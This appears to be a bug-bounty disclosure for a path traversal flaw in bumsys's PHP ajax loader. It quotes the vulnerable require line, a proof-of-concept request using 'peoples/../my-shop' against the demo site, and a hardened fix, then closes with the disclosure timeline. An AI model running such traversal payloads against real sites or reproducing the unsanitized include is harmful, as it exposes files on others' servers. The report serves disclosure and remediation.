Path Traversal in code in unilogies/bumsys

Valid

Reported on

Mar 8th 2023


Description

The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '.../...//' (doubled triple dot slash) sequences that can resolve to a location that is outside of that directory.

Proof of Concept

Code that has the vulnerability:

if(isset($_GET['module'])) {

    // Build the page location.
    // $_GET['module'] is concatenated as-is: no allowlist, no stripping of
    // ".." segments, and no check that the result stays under DIR_MODULE.
    $ajaxModulePage = DIR_MODULE . $_GET['module'] . "/ajax.php";

    // Check whether the ajax page exists (this does not reject traversal,
    // it only confirms the traversed-to file is present)
    if(file_exists($ajaxModulePage)) {
        // Load the ajax module page
        require $ajaxModulePage;

        // If iCheck is needed then include it.
        if(isset($_GET["icheck"]) and $_GET["icheck"] === "true") {
            echo "<script> $('input[type=\"checkbox\"].square').iCheck({ checkboxClass: 'icheckbox_square-blue', }) </script>";
        }

        // If tooltip is needed then include it.
        if(isset($_GET["tooltip"]) and $_GET["tooltip"] === "true") {
            echo "<script> $(document).ready(function() { $('[data-toggle=\"tooltip\"]').tooltip(); }); </script>";
        }

        // If select2 is needed then include it.
        if(isset($_GET["select2"]) and $_GET["select2"] === "true") {
            echo "<script> $(document).ready(function() { $('.select2').select2(); }); </script>";
        }

    } else {

        echo "<div class='alert alert-danger'>Invalid module url. Please check the form action.</div>";

    }

}

Request:

POST /xhr/?module=peoples/../my-shop&page=posSaleList HTTP/1.1
Host: demo.bumsys.org
Cookie: eid=1; __9f5aaf9a1c723f88a93114980386cd57d852e02a=tuuv72f7ij41fn128ha9u1vjs4; currencySymbol=%E0%A7%B3; keepAlive=1; __2a394d7098ce5a777abe5dc58243b7f5e3fca7ac=tvakqcbhioa0cuotreneas9ad0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Csrf-Token: 36e268f96394f73e89350d434bf6e1123ea3b07f
X-Requested-With: XMLHttpRequest
Content-Length: 0
Origin: https://demo.bumsys.org
Referer: https://demo.bumsys.org/peoples/user-list/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

Through this vulnerability, it is possible to change the path that is passed to require. With

module=peoples

Full Path:

/home/alamdev/bumsys/module/peoples/ajax.php

the "peoples" page opens as intended. But if we instead send

peoples/../my-shop

Edited Path:

/home/alamdev/bumsys/module/peoples/../my-shop/ajax.php

Result path:

/home/alamdev/bumsys/module/my-shop/ajax.php

The ".." segment goes up one directory and the "my-shop" module is opened instead.
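The following is an added example, not code from the report or from the bumsys code base, showing how the lookup on the vulnerable line can be hardened: the module name is restricted to a single path component, and the resolved file is checked with realpath() to still lie under the module root. The function name resolveModuleAjax and the temporary directory layout are assumptions made for the demonstration.

```php
<?php
// Added example (not part of the report or the bumsys code base): a hardened
// replacement for the vulnerable lookup. Two independent checks are applied:
// an allowlist on the module name and a realpath() containment check.

declare(strict_types=1);

// Returns the absolute path of the module's ajax.php, or null if the module
// name is rejected or resolves outside $dirModule.
function resolveModuleAjax(string $dirModule, string $module): ?string
{
    // 1. Allowlist: a module name is a single path component, nothing else.
    //    This rejects "peoples/../my-shop", "../x", "./x" and NUL bytes outright.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $module)) {
        return null;
    }

    // 2. Containment: canonicalize and verify the result stays under the
    //    module root. This also guards against symlinked module directories.
    $root = realpath($dirModule);
    $candidate = realpath($dirModule . DIRECTORY_SEPARATOR . $module . DIRECTORY_SEPARATOR . 'ajax.php');
    if ($root === false || $candidate === false) {
        return null;
    }
    if (strpos($candidate, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

// Demonstration on a constructed layout mirroring the report's module paths.
$base = sys_get_temp_dir() . '/bumsys-demo-' . bin2hex(random_bytes(4));
foreach (['peoples', 'my-shop'] as $m) {
    mkdir("$base/module/$m", 0700, true);
    file_put_contents("$base/module/$m/ajax.php", "<?php // $m\n");
}
$dirModule = "$base/module";

$cases = [
    'peoples',               // legitimate module: resolves
    'peoples/../my-shop',    // the report's payload: rejected by the allowlist
    '../index',              // plain traversal: rejected
    "peoples\0",             // NUL byte: rejected
];
foreach ($cases as $m) {
    $r = resolveModuleAjax($dirModule, $m);
    printf("%-22s => %s\n", addcslashes($m, "\0"), $r === null ? 'REJECTED' : $r);
}
```

Only the first case prints a path; the other three print REJECTED, and the realpath() check would additionally catch any module directory that is itself a symlink pointing outside the module root.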

Impact

This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.

Occurrences

$ajaxModulePage = DIR_MODULE . $_GET['module'] . "/ajax.php";
We are processing your report and will contact the unilogies/bumsys team within 24 hours. 3 months ago
We have contacted a member of the unilogies/bumsys team and are waiting to hear back 3 months ago
hatlesswizard
2 months ago

Researcher


Any update from you guys

Khurshid Alam validated this vulnerability a month ago
hatlesswizard has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
hatlesswizard
a month ago

Researcher


Could you give CVE please?

Khurshid Alam marked this as fixed in 2.2.0 with commit 1b426f a month ago
Khurshid Alam has been awarded the fix bounty
This vulnerability will not receive a CVE
Khurshid Alam published this vulnerability a month ago
index.php#L17 has been validated